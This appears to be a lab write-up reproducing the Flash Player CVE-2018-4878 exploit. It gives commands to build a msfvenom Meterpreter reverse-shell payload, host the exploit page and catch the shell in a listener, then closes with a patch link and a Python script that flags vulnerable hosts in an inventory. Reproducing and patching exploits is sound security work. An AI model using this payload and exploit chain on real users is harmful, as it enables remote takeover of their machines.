Vulnerability description
This vulnerability affects users who have Flash Player version 28.0.0.137 or earlier installed. The attacker lures the user into opening a malicious web page and directly obtains a shell on the user's machine.
Affected versions
Adobe Flash Player 28.0.0.137 and earlier
Vulnerability detection
Tool used:
https://github.com/anbai-inc/CVE-2018-4878
Put index.html and exploit.swf on our own web server and let the target machine access them. Sometimes the computer can pop up, and sometimes the IE browser crashes. The script appears to be unstable.
Exploit
Adobe Flash Player 28.0.0.137 Download:
https://pan.baidu.com/s/1Si3PDbR6cGwkGITJUTikYg Extraction code: p9ok
Attack machine: Kali
Target machine: Windows 7 + Adobe Flash Player 28.0.0.137
On Kali, first download the tool:
git clone https://github.com/anbai-inc/CVE-2018-4878.git
cd CVE-2018-4878
Generate the shellcode with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f python>./shellcode.txt
Replace the shellcode in cve-2018-4878.py with the shellcode from shellcode.txt.
Then modify the swf and html generation paths (the directory where the exploit files are generated).
Run the script to generate the exploit:
python cve-2018-4878.py
Start apache2:
service apache2 start
Copy the exploit files to the web directory:
cp exploit.swf /var/www/html/
cp index.html /var/www/html/
Start a listener in msf:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run
shell
whoami
When the target visits the generated html page, we get a shell on it.
But later I found that sometimes it is unsuccessful, and it also causes IE to crash.
Vulnerability hardening
Update flash plugin: https://www.flash.cn/
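
To find hosts that still need this update, the affected-version rule from this page (28.0.0.137 and earlier) can be applied to a software inventory. This is an added example, not part of the original post or the anbai-inc tool; the `host,version` CSV layout, the hostnames and the sample versions are constructed assumptions.

```python
import csv
import io

# Last affected build as stated on this page: versions <= this one are vulnerable.
LAST_AFFECTED = (28, 0, 0, 137)

# Constructed sample inventory (hostnames and versions are made up for the example).
SAMPLE_INVENTORY = '''host,flash_version
ws-01,28.0.0.137
ws-02,28.0.0.161
ws-03,"27,0,0,187"
ws-04,not installed
ws-05,28.0
'''


def parse_version(text):
    """Return a 4-tuple of ints for '28.0.0.137' or '28,0,0,137', else None."""
    parts = text.strip().replace(",", ".").split(".")
    if len(parts) > 4 or not all(p.isascii() and p.isdigit() for p in parts):
        return None
    nums = [int(p) for p in parts]
    return tuple(nums + [0] * (4 - len(nums)))  # pad '28.0' to (28, 0, 0, 0)


def triage(inventory_csv):
    """Sort 'host,version' rows into vulnerable, not_affected and unknown hosts."""
    result = {"vulnerable": [], "not_affected": [], "unknown": []}
    rows = csv.reader(io.StringIO(inventory_csv))
    next(rows, None)  # skip the header row
    for row in rows:
        if not row:
            continue  # blank line
        host = row[0].strip()
        version = parse_version(row[1]) if len(row) == 2 else None
        if version is None:
            result["unknown"].append(host)  # unparseable entry, needs a manual check
        elif version <= LAST_AFFECTED:
            result["vulnerable"].append(host)
        else:
            result["not_affected"].append(host)
    return result


if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status}: {', '.join(hosts) or '-'}")
```

Hosts listed as unknown have a version string the parser could not read and should be checked by hand rather than assumed safe.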